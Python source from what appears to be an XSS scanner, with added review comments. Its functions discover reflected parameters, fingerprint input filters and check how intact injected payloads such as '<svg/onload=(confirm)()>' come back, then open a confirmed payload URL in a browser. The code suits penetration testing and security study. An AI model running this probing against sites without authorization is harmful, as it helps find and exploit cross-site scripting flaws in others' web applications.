def paramfinder(url, method, paranames, paravalues, xsschecker):
    """Find request parameters for *url* and record the ones the page reflects.

    Two passes.  First, a bare request is made and every ``<input ... name=...>``
    tag in the response is scraped; each scraped name is moved to the front of
    the module-level ``blind_params`` list (mutated in place; an existing entry
    is removed before the re-insert).  Second, every name in ``blind_params``
    that is not already in *paranames* is sent with *xsschecker* as its value,
    and the name is appended to *paranames* (with ``''`` appended to
    *paravalues*) when the marker comes back in the response.

    Args:
        url: target URL, handed to ``make_request`` unchanged.
        method: HTTP method; ``'GET'`` builds a ``?name=value`` query string,
            any other value sends ``name=value`` as request data.
        paranames: list of already-known parameter names; extended in place.
        paravalues: list parallel to *paranames*; ``''`` is appended per find.
        xsschecker: marker string used as the probe value.

    Returns:
        None.  Results are reported via *paranames*/*paravalues* and stdout.
    """
    input_tag_re = r'<input[^<]*name=\'[^<]*\'*>|<input[^<]*name="[^<]*"*>'
    page = make_request(url, '', method)
    for tag in re.findall(input_tag_re, page):
        try:
            name = tag.split('name=')[1].split(' ')[0]
            name = name.replace('\'', '').replace('"', '')
        except UnicodeDecodeError:
            # Only decode errors are tolerated; anything else propagates,
            # exactly as in the original.
            continue
        print(
            '%s Heuristics found a potentially valid parameter: %s%s%s. Priortizing it.'
            % (good, green, name, end))
        # Move the scraped name to the head of the queue so it is probed first.
        if name in blind_params:
            blind_params.remove(name)
        blind_params.insert(0, name)

    # NOTE(review): the original condition was
    #   ('\'%s\'' % xsschecker or '"%s"' % xsschecker or ' %s ' % xsschecker) in response
    # The `or` chain is evaluated before `in`, and its first operand is a
    # non-empty string, so only the single-quoted form was ever tested.
    # That behaviour is reproduced here unchanged; the double-quoted and
    # space-padded forms are never checked.
    reflected_marker = '\'%s\'' % xsschecker
    for progress, param in enumerate(blind_params, 1):
        sys.stdout.write('\r%s Parameters checked: %i/%i' %
                         (run, progress, len(blind_params)))
        sys.stdout.flush()
        if param in paranames:
            continue
        if method == 'GET':
            probe = '?' + param + '=' + xsschecker
        else:
            probe = param + '=' + xsschecker
        response = make_request(url, probe, method)
        if reflected_marker in response:
            print('\n%s Valid parameter found : %s%s%s' %
                  (good, green, param, end))
            paranames.append(param)
            paravalues.append('')
def filter_checker(url, param_data, method, delay, xsschecker):
    """Classify the target's XSS filter as low, medium or high and print it.

    The *xsschecker* placeholder inside *param_data* is replaced with a probe
    string (URL-encoded via ``quote_plus``), the request is sent after
    ``sleep(delay)``, and the raw response is searched for the probe text.
    The first probe is tried alone; only when it is not reflected is the
    second, harmless unknown-tag probe sent.

    Args:
        url: target URL handed to ``make_request``.
        param_data: query/body string containing *xsschecker* as a placeholder.
        method: HTTP method; only ``'GET'`` triggers the browser/quit path.
        delay: seconds to pause before each request (per the original
            comment: default 0, 6 when a WAF is in front).
        xsschecker: placeholder to substitute with each probe.

    Returns:
        ``'medium'`` or ``'high'`` when the first probe was not reflected.
        NOTE(review): in the original the ``return`` sits inside the else
        branch, so the ``'low'`` verdict is assigned but never returned
        (``None`` comes back), and ``None`` also comes back after an
        exception.  That control flow is kept unchanged here.
    """
    strength = ''  # verdict; only 'medium'/'high' ever reach the caller
    try:
        # First probe.
        first_probe = '<svg/onload=(confirm)()>'
        first_string = param_data.replace(xsschecker, quote_plus(first_probe))
        sleep(delay)  # pause; default 0 s, 6 s when a WAF is in front
        first_response = make_request(url, first_string, method)
        if first_probe in first_response:
            print("%s Filter Strength : %sLow or None%s" % (good, green, end))
            print('%s Payload: <svg/onload=(confirm)()>' % good)
            print('%s Efficiency: 100%%' % good)
            answer = input(
                '%s A payload with 100%% efficiency was found. Continue scanning? [y/N] '
                % que).lower()
            if answer != 'y' and method == 'GET':
                # NOTE(review): str.strip removes *characters* found in
                # xsschecker from both ends, not the substring; kept as is.
                webbrowser.open(url + param_data.strip(xsschecker) + first_probe)
                quit()  # SystemExit is not an Exception, so it is not swallowed below
            strength = 'low'
            # No return on this path — see the docstring.
        else:
            # Second probe: an unknown tag carrying an unknown attribute.
            second_probe = '<zz onxx=yy>'
            second_string = param_data.replace(xsschecker, quote_plus(second_probe))
            sleep(delay)  # pause; default 0 s, 6 s when a WAF is in front
            second_response = make_request(url, second_string, method)
            if second_probe in second_response:
                print('%s Filter Strength : %sMedium%s' % (info, yellow, end))
                strength = 'medium'
            else:
                print('%s Filter Strength : %sHigh%s' % (bad, red, end))
                strength = 'high'
            return strength
    except Exception as e:
        print(e)
        try:
            # Best effort: surface a 3-digit status code embedded in the
            # exception text, if there is one.
            status = re.search(r'\d\d\d', str(e)).group()
            print(
                '%s Target doesn\'t seem to respond properly. Error Code: %s' %
                (bad, status))
        except:  # bare except kept from the original; re.search() -> None raises AttributeError
            print('%s Target doesn\'t seem to respond properly.' % bad)
def test_param_check(payload_to_check, payload_to_compare, OCCURENCE_NUM, url,
                     param_data, method, action, cookie):
    """Inject *payload_to_check* and report whether its reflection survives.

    The payload is wrapped in ``XSSSTART``/``XSSEND`` markers so each
    reflection can be located in the response.  For every reflection, the
    text following the marker is compared with the wrapped
    *payload_to_compare* via ``fuzz.partial_ratio`` (case-insensitive).

    Args:
        payload_to_check: string sent in place of the module-level
            ``xsschecker`` placeholder in *param_data*.
        payload_to_compare: string whose survival is measured in the response.
        OCCURENCE_NUM: 1-based index of the reflection that matters.
        url, method, cookie: forwarded to ``make_request``.
        param_data: query/body string containing ``xsschecker``.
        action: ``'do'`` enables the interactive reporting/prompt path.

    Returns:
        True only when a 100 % match is found at reflection number
        OCCURENCE_NUM; False otherwise.  A 100 % match at any other
        reflection still stops the scan of this response.

    Side effects:
        Prints results; in ``'do'`` mode asks the user whether to continue
        and, for ``'GET'``, may open a browser and call ``quit()``.
    """
    check_string = 'XSSSTART' + payload_to_check + 'XSSEND'
    compare_string = 'XSSSTART' + payload_to_compare + 'XSSEND'
    injected = param_data.replace(xsschecker, check_string)
    check_response = make_request(url, injected, method, cookie)
    window = len(compare_string)
    lowered_compare = compare_string.lower()
    # Human-readable names for the context codes held in occur_location.
    readable_location = {
        'comment': 'inside a HTML comment ',
        'html': 'as data or plaintext on the page',
        'script': 'as data in javascript',
        'attribute': 'as an attribute in a HTML tag',
    }
    success = False
    for counter, hit in enumerate(
            re.finditer('XSSSTART', check_response, re.IGNORECASE), 1):
        start = hit.start()
        efficiency = fuzz.partial_ratio(
            check_response[start:start + window].lower(), lowered_compare)
        if efficiency == 100:
            if action == 'do':
                print('\n%s Payload: %s' % (good, payload_to_compare))
                print('%s Efficiency: 100%%' % good)
                answer = input(
                    '%s A payload with 100%% efficiency was found. Continue scanning? [y/N] '
                    % que).lower()
                if answer != 'y' and method == 'GET':
                    webbrowser.open(
                        url + param_data.replace(xsschecker, payload_to_compare))
                    quit()
            # Only the requested reflection counts as a success, but any
            # perfect match ends the scan of this response.
            success = counter == OCCURENCE_NUM
            break
        if efficiency > 90 and action == 'do':
            print('\n%s Payload: %s' % (good, payload_to_compare))
            print('%s Efficiency: %s' % (good, efficiency))
            # NOTE(review): the bare except mirrors the original — an
            # out-of-range OCCURENCE_NUM or an unknown context code silently
            # moves on to the next reflection instead of reporting.
            try:
                location = readable_location[occur_location[OCCURENCE_NUM - 1]]
                print('%s Location: %s' % (good, location))
                break
            except:
                continue
    return success
def which_quote(OCCURENCE_NUM, url, param_data, method, cookie):
    """Return the quote character directly before the Nth reflection.

    The module-level ``xsschecker`` placeholder in *param_data* is wrapped in
    ``ST4RTSSX``/``3NDSSX`` markers, the request is sent, and the character
    preceding reflection number *OCCURENCE_NUM* (1-based) is inspected.

    Args:
        OCCURENCE_NUM: 1-based index of the reflection to examine.
        url, method, cookie: forwarded to ``make_request``.
        param_data: query/body string containing ``xsschecker``.

    Returns:
        ``"'"`` or ``'"'`` when that character directly precedes the Nth
        marker, ``''`` when it does not, and ``None`` when fewer than
        OCCURENCE_NUM reflections exist (the loop simply runs out).
        A failed request is treated as an empty response.
    """
    marker = 'ST4RTSSX'
    wrapped = marker + xsschecker + '3NDSSX'
    injected = param_data.replace(xsschecker, wrapped)
    try:
        body = make_request(url, injected, method, cookie)
    except:  # bare except kept from the original: any failure -> no reflections
        body = ''
    no_quote = ''
    for counter, hit in enumerate(re.finditer(marker, body, re.IGNORECASE), 1):
        if counter != OCCURENCE_NUM:
            continue
        # Slice rather than index so a match at offset 0 yields '' instead
        # of wrapping around to the last character of the response.
        preceding = body[hit.start() - 1:hit.start()]
        if preceding in ('\'', '"'):
            return preceding
        return no_quote